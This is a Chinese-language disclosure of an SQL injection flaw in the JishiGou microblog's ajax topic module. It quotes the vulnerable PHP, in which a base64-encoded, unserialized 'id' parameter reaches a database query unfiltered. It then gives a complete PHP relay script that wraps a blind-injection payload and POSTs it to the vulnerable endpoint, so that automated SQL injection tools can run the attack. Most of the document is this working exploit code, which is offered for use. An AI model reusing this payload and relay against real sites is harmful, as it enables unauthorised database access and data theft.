/modules/ajax/topic.mod.php
function Pic_ajax() {//echo 11; //echo base64_encode(serialize(array('a'=>'0\'#'))); $options = array(); $TopicListLogic = Load::logic('topic_list', 1); $per_page_num = $this->Post['pp_num'] ? (int)$this->Post['pp_num'] : 20; $cache_time = $this->Post['c_time'] ? (int)$this->Post['c_time'] : 10; $uid = $this->Post['uid'] ? $this->Post['uid'] : ''; if($this->Code =='channel'){ $id = $this->Post['id'] ? $this->Post['id'] : ''; //获取 $options = array( 'item'=>'channel', 'item_id' => unserialize(base64_decode($id)),//解码,应为Base64所以无视Gpc,记事狗微薄最新注入漏洞漏洞预警
。。 'perpage' => $per_page_num, ); $info = $TopicListLogic->get_data($options);//查询函数 里面也没做任何过滤test
可能注入起来比较麻烦
应为没有回显 只能盲注,
所以我写了个中转程序 丢工具跑
<?php$data=base64_encode(serialize(array('a'=>'0\') and 1='.$_GET[id].'#'))); $flag = 0; $post = ''; $errno = ''; $errstr = ''; $host='127.0.0.1'; $path='/jsg';$argv = array( 'id'=>$data,);foreach ($argv as $key=>$value) { if ($flag!=0) { $post .= "&"; $flag = 1; } $post.= $key."="; $post.= urlencode($value); $flag = 1; } $length = strlen($post); //创建socket连接 $fp = fsockopen("$host",80,$errno,$errstr,10) or exit($errstr."--->".$errno); //构造post请求的头 $header = "POST {$path}/ajax.php?mod=topic&code=channel HTTP/1.1\r\n"; $header .= "Host: {$host}\r\n"; $header .= "Referer: /flandy/post.php\r\n"; $header .= "Content-Type: application/x-www-form-urlencoded\r\n"; $header .= "Content-Length: ".$length."\r\n"; $header .= "Connection: Close\r\n\r\n"; //添加post的字符串 $header .= $post."\r\n"; //发送post的数据 fputs($fp,$header); $inheader = 1; while (!feof($fp)) { $line = fgets($fp,1024); //去除请求包的头只显示页面的返回数据 if ($inheader && ($line == "\n" || $line == "\r\n")) { $inheader = 0; } if ($inheader == 0) { echo $line; } }fclose($fp);?>跑起来的速度还凑合